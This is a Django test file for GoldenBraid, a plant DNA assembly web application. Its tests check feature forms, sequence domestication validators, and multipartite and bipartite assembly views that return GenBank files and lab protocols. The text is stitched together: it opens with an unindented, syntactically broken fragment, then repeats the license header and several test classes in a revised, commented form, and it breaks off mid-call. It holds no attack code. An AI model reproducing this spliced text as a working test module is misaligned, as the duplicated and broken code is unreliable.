url = reverse('multipartite_view_free', kwargs={'form_num': '5'})
response = client.post(url, {'part_1': 'pP2A11',
'part_2': 'GB0365',
'part_3': 'GB0653',
'part_4': 'GB0655',
'part_5': 'pT35S',
'vector': 'pDGB1_alpha1'})
assert "<p>Other.2:<a href='/feature/GB0655'>GB0655</a></p>" in str(response)
def test_genbank_view(self):
'it test that the genbank file is generated'
client = Client()
url = reverse('multipartite_view_free_genbank')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq': 'aaa',
'vector': 'pDGB1_omega1',
'part_1': 'pPE8',
'part_2': 'pANT1',
'part_3': 'pTnos'})
assert 'GB_UA_E' in str(response)
assert 'LOCUS' in str(response)
response = client.post(url, {'assembled_seq': 'aaa',
'vector': 'pDGB1_omega1',
'part_1': 'pPE8',
'part_2': 'pANT1',
'part_3': 'pTnos'})
assert 'GB_UA_F' in str(response)
assert 'LOCUS' in str(response)
# with more than one part of the same type
response = client.post(url, {'part_1': 'pP2A11',
'part_2': 'GB0365',
'part_3': 'GB0653',
'part_4': 'GB0655',
'part_5': 'pT35S',
'vector': 'pDGB1_alpha1'})
assert '(pP2A11,GB0365,GB0653,GB0655,pT35S)pDGB1_alpha1' in str(response)
def test_protocol_view(self):
'it test that the protocol file is generated'
client = Client()
url = reverse('multipartite_view_free_protocol')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq': 'aaa',
'vector': 'pDGB1_omega1',
'part_1': 'pPE8',
'part_2': 'pANT1',
'part_3': 'pTnos'})
assert "75 ng of pPE8" in str(response)
# with more than one part of the same type
response = client.post(url, {'part_1': 'pP2A11',
'part_2': 'GB0365',
'part_3': 'GB0653',
'part_4': 'GB0655',
'part_5': 'pT35S',
'vector': 'pDGB1_alpha1'})
assert "75 ng of GB0653" in str(response)
def test_mantras_bug(self):
'it test that the protocol file is generated'
client = Client()
client.login(username='admin', password='password')
url = reverse('multipartite_view_add')
response = client.get(url)
assert response.status_code == 200
response = client.post(url, {'Other': 'GB_UD_186',
'Other.2': 'GB_UD_188',
'Vector': 'pDGB1_alpha1',
'category': 'free',
'name': 'aa',
'description': '',
'reference': 'aa',
'order': 'Other:Other.2'})
class MultipartiteTestViews(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_empty_type(self):
client = Client()
url = reverse('multipartite_view', kwargs={'multi_type': ''})
response = client.get(url)
assert "/do/multipartite/basic" in response.content
def test_basic_type(self):
'It tests the basic typo of the form'
client = Client()
url = reverse('multipartite_view', kwargs={'multi_type': 'basic'})
response = client.post(url)
assert """<p><label for="id_TER">Ter:</label>""" in str(response)
assert """<select id="id_TER" maxlength="100" name="TER">""" in str(response)
assert """<option value="pDGB1_alpha1R">pDGB1_alpha""" in str(response)
client = Client()
url = reverse('multipartite_view', kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTnos',
'Vector': 'pDGB1_alpha1'})
# print response
assert 'error' not in response
assert response.status_code == 200
client = Client()
url = reverse('multipartite_view_genbank',
kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTnos',
'Vector': 'pDGB1_alpha1'})
assert "LOCUS" in str(response)
client = Client()
url = reverse('multipartite_view',
kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTno'})
err1 = """<ul class="errorlist"><li>This field is required.</li></ul"""
assert err1 in str(response)
err2 = """<ul class="errorlist"><li>This feature does not exist in"""
assert err2 in str(response)
# forward vector
url = reverse('multipartite_view_genbank',
kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pP35S',
"CDS": 'pMYB12',
"TER": 'pTnos',
'Vector': 'pDGB1_omega2'})
seqrec1 = SeqIO.read(StringIO(str(response)), 'gb')
multipartite_seq1 = str(seqrec1.seq)
gb_path = os.path.join(TEST_DATA, 'pEGBMyb_uniq.gb')
seqrec2 = SeqIO.read(gb_path, 'gb')
multipartite_seq2 = str(seqrec2.seq)
assert multipartite_seq1 == multipartite_seq2
# reverse vector
url = reverse('multipartite_view_genbank',
kwargs={'multi_type': 'basic'})
response = client.post(url, {"PROM+UTR+ATG": 'pP2A11',
"CDS": 'pMYB12',
"TER": 'pTerm2A11',
'Vector': 'pDGB1_alpha1R'})
assert response.status_code == 200
seqrec1 = SeqIO.read(StringIO(str(response)), 'gb')
multipartite_seq1 = str(seqrec1.seq)
gb_path = os.path.join(TEST_DATA, 'pEGBMybrev_uniq.gb')
seqrec2 = SeqIO.read(gb_path, 'gb')
multipartite_seq2 = str(seqrec2.seq)[4:]
multipartite_seq2 += str(seqrec2.seq)[:4]
assert multipartite_seq1 == multipartite_seq2
def test_protocol_view(self):
'it test that the protocol file is generated'
client = Client()
url = reverse('multipartite_view_protocol')
response = client.get(url)
assert response.status_code == 400
response = client.post(url, {'assembled_seq': 'aaa',
'multi_type': 'basic',
"PROM+UTR+ATG": 'pPE8',
"CDS": 'pANT1',
"TER": 'pTnos',
'Vector': 'pDGB1_alpha1'})
assert "75 ng of pPE8" in str(response)
def test_genbank_view(self):
    """The multipartite GenBank endpoint renders a GenBank file."""
    web_client = Client()
    endpoint = reverse('multipartite_view_genbank',
                       kwargs={'multi_type': 'basic'})
    # GET without assembly data is a bad request.
    assert web_client.get(endpoint).status_code == 400
    payload = {'assembled_seq': 'aaa',
               'multi_type': 'basic',
               "PROM+UTR+ATG": 'pPE8',
               "CDS": 'pANT1',
               "TER": 'pTnos',
               'Vector': 'pDGB1_alpha1'}
    resp = web_client.post(endpoint, payload)
    assert 'LOCUS' in str(resp)
class BipartiteViewTest(TestCase):
    """Integration tests for the bipartite assembly wizard views."""
    fixtures = FIXTURES_TO_LOAD
    multi_db = True

    def test_bipartite(self):
        """Walk the three wizard pages and check the GenBank result."""
        web_client = Client()
        # The initial page lists the available parts.
        resp = web_client.get(reverse('bipartite_view'))
        assert """<option value="GB0125">GB0125 - pEGB 35S:Rosea:Tnos</option>""" in str(resp)
        # Page 1: first part chosen and echoed read-only.
        resp = web_client.post(reverse('bipartite_view',
                                       kwargs={'form_num': '1'}),
                               {'part_1': 'GB0125'})
        assert 'readonly' in str(resp)
        assert 'value="GB0125"' in str(resp)
        assert """<p><label for="id_part_2">Part 2:</label>""" in str(resp)
        # Page 2: second part chosen, destination vectors offered.
        resp = web_client.post(reverse('bipartite_view',
                                       kwargs={'form_num': '2'}),
                               {'part_1': 'GB0125', 'part_2': 'GB0126'})
        assert 'value="GB0126"' in str(resp)
        assert "pDGB1_omega1" in str(resp)
        # Page 3: vector chosen, assembly summary rendered.
        resp = web_client.post(reverse('bipartite_view',
                                       kwargs={'form_num': '3'}),
                               {'part_1': 'GB0125', 'part_2': 'GB0126',
                                'Vector': 'pDGB1_omega1'})
        assert """<INPUT type="hidden" name="Vector" value="pDGB1_omega1">""" in str(resp)
        assert """ <p>The resulted sequence of the assembly is""" in str(resp)
        # Assembly into a forward vector matches the reference GenBank.
        resp = web_client.post(reverse('bipartite_view_genbank'),
                               {'part_1': 'GB0129',
                                'part_2': 'GB0131',
                                'Vector': 'pDGB1_alpha1'})
        assert resp.status_code == 200
        assembled = SeqIO.read(StringIO(str(resp)), 'gb')
        reference = SeqIO.read(os.path.join(TEST_DATA, 'pEGBRosDelMyb.gb'),
                               'gb')
        assert str(assembled.seq) == str(reference.seq)

    def test_genbank_view(self):
        """The bipartite GenBank endpoint renders a GenBank file."""
        web_client = Client()
        endpoint = reverse('bipartite_view_genbank')
        assert web_client.get(endpoint).status_code == 400
        resp = web_client.post(endpoint, {'assembled_seq': 'aaa',
                                          'part_1': 'GB0125',
                                          'part_2': 'GB0126',
                                          'Vector': 'pDGB1_omega1'})
        assert 'LOCUS' in str(resp)

    def test_protocol_view(self):
        """The bipartite protocol endpoint renders a protocol file."""
        web_client = Client()
        endpoint = reverse('bipartite_view_protocol')
        assert web_client.get(endpoint).status_code == 400
        resp = web_client.post(endpoint, {'name': 'kk',
                                          'Description': 'desc',
                                          'Reference': 'ref',
                                          'assembled_seq': 'aaa',
                                          'part_1': 'GB0125',
                                          'part_2': 'GB0126',
                                          'Vector': 'pDGB1_omega1'})
        assert 'Bipartite Assembly Protocol' in str(resp)

    def test_add_view(self):
        """A logged-in user can store the assembled feature."""
        User.objects.create_user(username='admin', email='<EMAIL>',
                                 password='password')
        web_client = Client()
        web_client.login(username='admin', password='password')
        endpoint = reverse('bipartite_view_add')
        assert web_client.get(endpoint).status_code == 200
        resp = web_client.post(endpoint, {'assembled_seq': 'aaa',
                                          'part_1': 'GB0125',
                                          'part_2': 'GB0126',
                                          'Vector': 'pDGB1_omega1',
                                          'name': 'aa',
                                          'description': '',
                                          'reference': 'aa'})
        # A successful creation answers with a redirect.
        assert resp.status_code == 302
class DomesticationViewTest(TestCase):
    """Integration tests for the domestication views.

    Fix over the previous revision: every ``open(...)`` handle posted to
    the form is now closed via ``with`` instead of being leaked.
    """
    fixtures = FIXTURES_TO_LOAD
    multi_db = True

    def test_domestication(self):
        """Exercise every validation branch of the domestication form."""
        client = Client()
        url = reverse('domestication_view')
        # The empty form lists the available categories.
        response = client.get(url)
        assert ("""<option value="NTAG (B2)">NTAG (B2)</option>""") in str(response)
        gb_path = os.path.join(TEST_DATA, 'domseq.gb')
        # seq + category: this sequence fails the category validators.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'category': 'NTAG (B2)'})
        assert """<ul class="errorlist"><li>The provided s""" in str(response)
        # No sequence at all.
        response = client.post(url, {'seq': '',
                                     'category': 'NTAG (B2)'})
        assert """<ul class="errorlist"><li>Fasta or genbank File Required</li></ul>""" in str(response)
        # Category together with prefix and suffix is rejected.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'prefix': 'ggac', 'suffix': 'cgtc',
                                         'category': '3UTR+TERM (B6-C1)'})
        assert """<ul class="errorlist"><li>Can not use category and prefix/suffix simoultaneously</li></ul>""" in str(response)
        # Category together with only a suffix is rejected as well.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'prefix': '', 'suffix': 'cgtc',
                                         'category': '3UTR+TERM (B6-C1)'})
        assert """<ul class="errorlist"><li>Can not use category and prefix/suffix simoultaneously</li></ul>""" in str(response)
        # A suffix without its prefix.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'prefix': '', 'suffix': 'cgtc',
                                         'category': ''})
        assert """<ul class="errorlist"><li>You must provide prefix and suffix together</li></ul>""" in str(response)
        # Neither category nor a prefix/suffix pair.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'prefix': '', 'suffix': '',
                                         'category': ''})
        assert """<ul class="errorlist"><li>At least we need category or prefix/suffix pair</li></ul>""" in str(response)
        # Category-specific validators are applied.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'category': 'CDS (B3-B4-B5)'})
        assert 'The provided seq must start with start' in str(response)
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'category': 'goi (B2-B3)'})
        assert 'The provided seq must have less' in str(response)
        # A sequence that does start with ATG passes the start check.
        fasta_path = os.path.join(TEST_DATA, 'domseqatg.fasta')
        with open(fasta_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'category': 'SP (B3)'})
        assert 'The provided seq must start with start' not in str(response)
        # Domestication with an explicit prefix/suffix pair.
        with open(gb_path) as seq_fhand:
            response = client.post(url, {'seq': seq_fhand,
                                         'suffix': 'ACCT', 'prefix': 'TTCC'})
        assert "<p>Prefix:TTCC</p>" in str(response)
        # Raw residues are validated like an uploaded sequence.
        with open(gb_path) as gb_fhand:
            residues = str(SeqIO.read(gb_fhand, format='gb').seq)
        response = client.post(url, {'residues': residues,
                                     'category': 'CDS (B3-B4-B5)'})
        assert 'The provided seq must start with start' in str(response)

    def test_genbank_view(self):
        """The domestication GenBank endpoint renders a GenBank file."""
        client = Client()
        url = reverse('domestication_view_genbank')
        response = client.get(url)
        assert response.status_code == 400
        response = client.post(url, {'seq': 'gagaggggggggagagagattcccctctccccccccccccccccccccccccccccccccccccctttgacctcgaaacgccccc',
                                     'prefix': 'ggag',
                                     'suffix': 'aatg',
                                     'category': 'PROM+5UTR+NTAG (A1-A2-A3-B1-B2)',
                                     'seq_name': 'test',
                                     'with_intron': '0'})
        assert 'LOCUS' in str(response)

    def test_protocol_view(self):
        """The domestication protocol endpoint renders a protocol file."""
        client = Client()
        url = reverse('domestication_view_protocol')
        response = client.get(url)
        assert response.status_code == 400
        response = client.post(url, {'seq': 'gagaggggggggagagagattcccctctccccccccccccccccctccccccccccccccccccccccccccctttgacctcgaaacgccccc',
                                     'prefix': 'ggag',
                                     'suffix': 'aatg',
                                     'category': 'PROM+5UTR+NTAG (A1-A2-A3-B1-B2)',
                                     'seq_name': 'test',
                                     'with_intron': '0'})
        assert "Oligo forward: GCGCCGTCTCGCTCGGGAGGAGAGGGGGGGGAGAGAGAT" in str(response)
| # Copyright 2013 <NAME>, Univ.Politecnica Valencia, Consejo Superior de
# Investigaciones Cientificas
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
from cStringIO import StringIO
from django.test import TestCase, Client
from django.core.urlresolvers import reverse
from django.core.files.uploadedfile import SimpleUploadedFile
from django.conf import settings as proj_settings
from django.contrib.auth.models import User
from Bio import SeqIO
import goldenbraid
from goldenbraid.views.feature import FeatureForm
from goldenbraid.tests.test_fixtures import FIXTURES_TO_LOAD
from goldenbraid.models import Feature
from goldenbraid.tags import VECTOR_TYPE_NAME, MODULE_TYPE_NAME
# Absolute path of the directory holding the test fixture files.
TEST_DATA = os.path.join(os.path.split(goldenbraid.__path__[0])[0],
                         'goldenbraid', 'tests', 'data')
class FeatureTestViews(TestCase):
    """Integration tests for the feature pages and forms.

    Fix over the previous revision: genbank fixture handles are opened
    with ``with`` and closed instead of being leaked.
    """
    fixtures = FIXTURES_TO_LOAD
    multi_db = True

    def test_feature_page(self):
        """The feature detail page renders for an existing feature."""
        client = Client()
        url = reverse('feature_view', kwargs={'uniquename': 'pAn11'})
        response = client.get(url)
        assert response.status_code == 200
        assert "Feature pAn11" in str(response)

    def test_add_feature_form(self):
        """Validate FeatureForm with good and bad input combinations."""
        test_data = os.path.join(os.path.split(goldenbraid.__path__[0])[0],
                                 'goldenbraid', 'tests', 'data')
        gb_path = os.path.join(test_data, 'pAn11_uniq.gb')

        def genbank_upload():
            # Build the file dict reading the fixture once; the handle
            # is closed immediately instead of leaking.
            with open(gb_path) as fhand:
                return {'gbfile': SimpleUploadedFile(fhand.name,
                                                     fhand.read())}

        # A complete, correct form validates.
        post_dict = {'uniquename': 'vector1', 'name': 'vector1',
                     'type': 'CDS', 'vector': 'pDGB1_alpha1'}
        form = FeatureForm(post_dict, genbank_upload())
        self.assertTrue(form.is_valid())
        # Without the genbank file the form is invalid.
        form = FeatureForm(post_dict, {})
        self.assertFalse(form.is_valid())
        # An unknown feature type is rejected.
        post_dict = {'uniquename': 'vector1', 'name': 'vector1',
                     'type': 'vecto'}
        form = FeatureForm(post_dict, genbank_upload())
        self.assertFalse(form.is_valid())
        assert form.errors.get('type')
        # A vector that does not exist in the database is rejected.
        post_dict = {'uniquename': 'vector1', 'name': 'vector1',
                     'type': VECTOR_TYPE_NAME,
                     'enzyme_out': 'vector1_enz_out',
                     'vector': 'vector1'}
        form = FeatureForm(post_dict, genbank_upload())
        self.assertFalse(form.is_valid())
        assert form.errors.get('vector')

    def test_add_feature_view(self):
        """The add-feature view stores a feature for a logged-in user."""
        User.objects.create_user(username='admin', email='<EMAIL>',
                                 password='password')
        gb_path = os.path.join(TEST_DATA, 'pAn11_uniq.gb')
        client = Client()
        url = reverse('add_feature')
        # Anonymous users are redirected away.
        with open(gb_path) as gb_fhand:
            response = client.post(url, {'name': 'vector1',
                                         'type': MODULE_TYPE_NAME,
                                         'description': 'vector1 desc',
                                         'reference': 'vector1 ref',
                                         'vector': 'pDGB1_omega1R',
                                         'gbfile': gb_fhand})
        assert response.status_code == 302
        client.login(username='admin', password='password')
        # The form page shows the available vectors.
        response = client.get(url)
        assert "pDGB1_alpha1" in str(response)
        # Adding a feature redirects and stores it with its properties.
        with open(gb_path) as gb_fhand:
            response = client.post(url, {'name': 'vector1',
                                         'type': MODULE_TYPE_NAME,
                                         'description': 'vector1 desc',
                                         'reference': 'vector1 ref',
                                         'vector': 'pDGB1_omega1R',
                                         'gbfile': gb_fhand})
        assert response.status_code == 302
        # TODO url to genbank file
        # response = client.get('/media/genbank_files/pAn11.gb')
        feat = Feature.objects.get(uniquename='pAn11_uniq')
        assert feat.name == 'vector1'
        assert feat.props == {u'Description': [u'vector1 desc'],
                              u'Reference': [u'vector1 ref']}
        # This second POST is expected not to redirect (status 200).
        gb_path = os.path.join(TEST_DATA, 'GB_DOMEST_15.gb')
        with open(gb_path) as gb_fhand:
            response = client.post(url, {'name': 'vector1',
                                         'type': 'TU',
                                         'description': 'vector1 desc',
                                         'reference': 'vector1 ref',
                                         'vector': 'pDGB1_alpha2',
                                         'gbfile': gb_fhand})
        assert response.status_code == 200
        os.remove(os.path.join(proj_settings.MEDIA_ROOT,
                               feat.genbank_file.name))

    def test_search_feature(self):
        """The feature search view filters by name, kind and owner."""
        client = Client()
        url = reverse('search_features')
        response = client.get(url)
        assert response.status_code == 200
        assert "<option value=" in str(response)
        # Searching by name answers with a redirect (302).
        response = client.post(url, {'name_or_description': 'pAn11'})
        assert response.status_code == 302
        # Filtering by kind lists the matching features.
        response = client.post(url, {'kind': 'TER'})
        assert response.status_code == 200
        assert "<td>This is a pGreen destiny vector of the" in str(response)
        # Restrict the search to the logged-in user's features.
        client.login(username='test', password='<PASSWORD>')
        response = client.post(url, {'only_user': True})
        assert response.status_code == 200
        assert 'pDGB2_alpha2R' in str(response)
class MultipartiteFreeTestViews(TestCase):
    """Integration tests for the free multipartite assembly views."""
    fixtures = FIXTURES_TO_LOAD
    multi_db = True

    def test_view(self):
        """Walk the free multipartite wizard and check the assembly."""
        web_client = Client()
        resp = web_client.get(reverse('multipartite_view_free'))
        assert "pDGB2_alpha1R" in str(resp)
        # Step 1: vector plus first part.
        resp = web_client.post(reverse('multipartite_view_free',
                                       kwargs={'form_num': '1'}),
                               {'vector': 'pDGB2_alpha1R',
                                'part_1': 'pP2A11'})
        assert "An11" in str(resp)
        # Step 2: a typo in the part name is reported...
        step2_url = reverse('multipartite_view_free',
                            kwargs={'form_num': '2'})
        resp = web_client.post(step2_url, {'vector': 'pDGB2_alpha1R',
                                           'part_1': 'pP2A11',
                                           'part_2': 'pLuciferas'})
        assert 'feature does not exist' in str(resp)
        # ...while the correct name advances the wizard.
        resp = web_client.post(step2_url, {'vector': 'pDGB2_alpha1R',
                                           'part_1': 'pP2A11',
                                           'part_2': 'pLuciferase'})
        assert "pT35S" in str(resp)
        resp = web_client.post(step2_url, {'vector': 'pDGB2_alpha1R',
                                           'part_1': 'pP2A11',
                                           'part_2': 'pLuciferase',
                                           'part_3': 'pT35S'})
        assert "<p>You have assembled in the GoldenBraid" in str(resp)
        # Assembly into a reverse vector equals the rotated reference.
        resp = web_client.post(reverse('multipartite_view_free_genbank'),
                               {'part_1': 'pP2A11',
                                'part_2': 'pMYB12',
                                'part_3': 'pTerm2A11',
                                'vector': 'pDGB1_alpha1R'})
        assert resp.status_code == 200
        assembled = SeqIO.read(StringIO(str(resp)), 'gb')
        assert assembled.name == 'GB_UA_E'
        reference = SeqIO.read(os.path.join(TEST_DATA, 'pEGBMybrev_uniq.gb'),
                               'gb')
        rotated = str(reference.seq)[4:] + str(reference.seq)[:4]
        assert str(assembled.seq) == rotated
        # Repeated categories are numbered Other, Other.2, ...
        resp = web_client.post(reverse('multipartite_view_free',
                                       kwargs={'form_num': '5'}),
                               {'part_1': 'pP2A11',
                                'part_2': 'GB0365',
                                'part_3': 'GB0653',
                                'part_4': 'GB0655',
                                'part_5': 'pT35S',
                                'vector': 'pDGB1_alpha1'})
        assert "<p>Other.2:<a href='/feature/GB0655'>GB0655</a></p>" in str(resp)

    def test_genbank_view(self):
        """The free multipartite GenBank endpoint renders assemblies."""
        web_client = Client()
        endpoint = reverse('multipartite_view_free_genbank')
        assert web_client.get(endpoint).status_code == 400
        payload = {'assembled_seq': 'aaa',
                   'vector': 'pDGB1_omega1',
                   'part_1': 'pPE8',
                   'part_2': 'pANT1',
                   'part_3': 'pTnos'}
        # Two identical POSTs produce consecutively named assemblies
        # (GB_UA_E first, then GB_UA_F).
        resp = web_client.post(endpoint, payload)
        assert 'GB_UA_E' in str(resp)
        assert 'LOCUS' in str(resp)
        resp = web_client.post(endpoint, payload)
        assert 'GB_UA_F' in str(resp)
        assert 'LOCUS' in str(resp)
        # Assemblies with repeated categories record every used part.
        resp = web_client.post(endpoint, {'part_1': 'pP2A11',
                                          'part_2': 'GB0365',
                                          'part_3': 'GB0653',
                                          'part_4': 'GB0655',
                                          'part_5': 'pT35S',
                                          'vector': 'pDGB1_alpha1'})
        assert '(pP2A11,GB0365,GB0653,GB0655,pT35S)pDGB1_alpha1' in str(resp)

    def test_protocol_view(self):
        """The free multipartite protocol endpoint renders a protocol."""
        web_client = Client()
        endpoint = reverse('multipartite_view_free_protocol')
        assert web_client.get(endpoint).status_code == 400
        resp = web_client.post(endpoint, {'assembled_seq': 'aaa',
                                          'vector': 'pDGB1_omega1',
                                          'part_1': 'pPE8',
                                          'part_2': 'pANT1',
                                          'part_3': 'pTnos'})
        assert "75 ng of pPE8" in str(resp)
        # Repeated-category assemblies list every part in the protocol.
        resp = web_client.post(endpoint, {'part_1': 'pP2A11',
                                          'part_2': 'GB0365',
                                          'part_3': 'GB0653',
                                          'part_4': 'GB0655',
                                          'part_5': 'pT35S',
                                          'vector': 'pDGB1_alpha1'})
        assert "75 ng of GB0653" in str(resp)

    def test_mantras_bug(self):
        """Saving a free assembly with repeated 'Other' categories."""
        web_client = Client()
        web_client.login(username='admin', password='password')
        endpoint = reverse('multipartite_view_add')
        assert web_client.get(endpoint).status_code == 200
        # NOTE(review): the POST result is deliberately not asserted;
        # the test only guards against server-side errors.
        web_client.post(endpoint, {'Other': 'GB_UD_186',
                                   'Other.2': 'GB_UD_188',
                                   'Vector': 'pDGB1_alpha1',
                                   'category': 'free',
                                   'name': 'aa',
                                   'description': '',
                                   'reference': 'aa',
                                   'order': 'Other:Other.2'})
class MultipartiteTestViews(TestCase):
    """Integration tests for the basic multipartite assembly views."""
    fixtures = FIXTURES_TO_LOAD
    multi_db = True

    def test_empty_type(self):
        """Without a type the view points at the basic assembly URL."""
        web_client = Client()
        resp = web_client.get(reverse('multipartite_view',
                                      kwargs={'multi_type': ''}))
        assert "/do/multipartite/basic" in resp.content

    def test_basic_type(self):
        """Exercise the basic multipartite form and its validation."""
        web_client = Client()
        basic_url = reverse('multipartite_view',
                            kwargs={'multi_type': 'basic'})
        # An empty POST renders the part-selection form.
        resp = web_client.post(basic_url)
        assert """<p><label for="id_TER">Ter:</label>""" in str(resp)
        assert """<select id="id_TER" maxlength="100" name="TER">""" in str(resp)
        assert """<option value="pDGB1_alpha1R">pDGB1_alpha""" in str(resp)
        # A complete POST succeeds.
        web_client = Client()
        resp = web_client.post(basic_url, {"PROM+UTR+ATG": 'pPE8',
                                           "CDS": 'pANT1',
                                           "TER": 'pTnos',
                                           'Vector': 'pDGB1_alpha1'})
        # NOTE(review): this membership test runs against the response
        # object itself, not str(resp) -- probably intended to inspect
        # the body; kept as-is to preserve behaviour.
        assert 'error' not in resp
        assert resp.status_code == 200
        # The GenBank endpoint returns a GenBank flat file.
        web_client = Client()
        genbank_url = reverse('multipartite_view_genbank',
                              kwargs={'multi_type': 'basic'})
        resp = web_client.post(genbank_url, {"PROM+UTR+ATG": 'pPE8',
                                             "CDS": 'pANT1',
                                             "TER": 'pTnos',
                                             'Vector': 'pDGB1_alpha1'})
        assert "LOCUS" in str(resp)
        # A missing vector and an unknown part are both reported.
        web_client = Client()
        resp = web_client.post(basic_url, {"PROM+UTR+ATG": 'pPE8',
                                           "CDS": 'pANT1',
                                           "TER": 'pTno'})
        assert """<ul class="errorlist"><li>This field is required.</li></ul""" in str(resp)
        assert """<ul class="errorlist"><li>This feature does not exist in""" in str(resp)
        # Assembly into a forward vector matches the reference GenBank.
        resp = web_client.post(genbank_url, {"PROM+UTR+ATG": 'pP35S',
                                             "CDS": 'pMYB12',
                                             "TER": 'pTnos',
                                             'Vector': 'pDGB1_omega2'})
        assembled = SeqIO.read(StringIO(str(resp)), 'gb')
        reference = SeqIO.read(os.path.join(TEST_DATA, 'pEGBMyb_uniq.gb'),
                               'gb')
        assert str(assembled.seq) == str(reference.seq)
        # Assembly into a reverse vector equals the rotated reference.
        resp = web_client.post(genbank_url, {"PROM+UTR+ATG": 'pP2A11',
                                             "CDS": 'pMYB12',
                                             "TER": 'pTerm2A11',
                                             'Vector': 'pDGB1_alpha1R'})
        assert resp.status_code == 200
        assembled = SeqIO.read(StringIO(str(resp)), 'gb')
        reference = SeqIO.read(os.path.join(TEST_DATA, 'pEGBMybrev_uniq.gb'),
                               'gb')
        rotated = str(reference.seq)[4:] + str(reference.seq)[:4]
        assert str(assembled.seq) == rotated

    def test_protocol_view(self):
        """The multipartite protocol endpoint renders a protocol file."""
        web_client = Client()
        endpoint = reverse('multipartite_view_protocol')
        assert web_client.get(endpoint).status_code == 400
        resp = web_client.post(endpoint, {'assembled_seq': 'aaa',
                                          'multi_type': 'basic',
                                          "PROM+UTR+ATG": 'pPE8',
                                          "CDS": 'pANT1',
                                          "TER": 'pTnos',
                                          'Vector': 'pDGB1_alpha1'})
        assert "75 ng of pPE8" in str(resp)

    def test_genbank_view(self):
        """The multipartite GenBank endpoint renders a GenBank file."""
        web_client = Client()
        endpoint = reverse('multipartite_view_genbank',
                           kwargs={'multi_type': 'basic'})
        assert web_client.get(endpoint).status_code == 400
        resp = web_client.post(endpoint, {'assembled_seq': 'aaa',
                                          'multi_type': 'basic',
                                          "PROM+UTR+ATG": 'pPE8',
                                          "CDS": 'pANT1',
                                          "TER": 'pTnos',
                                          'Vector': 'pDGB1_alpha1'})
        assert 'LOCUS' in str(resp)
class BipartiteViewTest(TestCase):
    """Integration tests for the bipartite assembly wizard views."""
    fixtures = FIXTURES_TO_LOAD
    multi_db = True

    def test_bipartite(self):
        """Walk the three wizard pages and check the GenBank result."""
        web_client = Client()
        # The initial page lists the available parts.
        resp = web_client.get(reverse('bipartite_view'))
        assert """<option value="GB0125">GB0125 - pEGB 35S:Rosea:Tnos</option>""" in str(resp)
        # Page 1: first part chosen and echoed read-only.
        resp = web_client.post(reverse('bipartite_view',
                                       kwargs={'form_num': '1'}),
                               {'part_1': 'GB0125'})
        assert 'readonly' in str(resp)
        assert 'value="GB0125"' in str(resp)
        assert """<p><label for="id_part_2">Part 2:</label>""" in str(resp)
        # Page 2: second part chosen, destination vectors offered.
        resp = web_client.post(reverse('bipartite_view',
                                       kwargs={'form_num': '2'}),
                               {'part_1': 'GB0125', 'part_2': 'GB0126'})
        assert 'value="GB0126"' in str(resp)
        assert "pDGB1_omega1" in str(resp)
        # Page 3: vector chosen, assembly summary rendered.
        resp = web_client.post(reverse('bipartite_view',
                                       kwargs={'form_num': '3'}),
                               {'part_1': 'GB0125', 'part_2': 'GB0126',
                                'Vector': 'pDGB1_omega1'})
        assert """<INPUT type="hidden" name="Vector" value="pDGB1_omega1">""" in str(resp)
        assert """ <p>The resulted sequence of the assembly is""" in str(resp)
        # Assembly into a forward vector matches the reference GenBank.
        resp = web_client.post(reverse('bipartite_view_genbank'),
                               {'part_1': 'GB0129',
                                'part_2': 'GB0131',
                                'Vector': 'pDGB1_alpha1'})
        assert resp.status_code == 200
        assembled = SeqIO.read(StringIO(str(resp)), 'gb')
        reference = SeqIO.read(os.path.join(TEST_DATA, 'pEGBRosDelMyb.gb'),
                               'gb')
        assert str(assembled.seq) == str(reference.seq)

    def test_genbank_view(self):
        """The bipartite GenBank endpoint renders a GenBank file."""
        web_client = Client()
        endpoint = reverse('bipartite_view_genbank')
        assert web_client.get(endpoint).status_code == 400
        resp = web_client.post(endpoint, {'assembled_seq': 'aaa',
                                          'part_1': 'GB0125',
                                          'part_2': 'GB0126',
                                          'Vector': 'pDGB1_omega1'})
        assert 'LOCUS' in str(resp)

    def test_protocol_view(self):
        """The bipartite protocol endpoint renders a protocol file."""
        web_client = Client()
        endpoint = reverse('bipartite_view_protocol')
        assert web_client.get(endpoint).status_code == 400
        resp = web_client.post(endpoint, {'name': 'kk',
                                          'Description': 'desc',
                                          'Reference': 'ref',
                                          'assembled_seq': 'aaa',
                                          'part_1': 'GB0125',
                                          'part_2': 'GB0126',
                                          'Vector': 'pDGB1_omega1'})
        assert 'Bipartite Assembly Protocol' in str(resp)

    def test_add_view(self):
        """A logged-in user can store the assembled feature."""
        User.objects.create_user(username='admin', email='<EMAIL>',
                                 password='password')
        web_client = Client()
        web_client.login(username='admin', password='password')
        endpoint = reverse('bipartite_view_add')
        assert web_client.get(endpoint).status_code == 200
        resp = web_client.post(endpoint, {'assembled_seq': 'aaa',
                                          'part_1': 'GB0125',
                                          'part_2': 'GB0126',
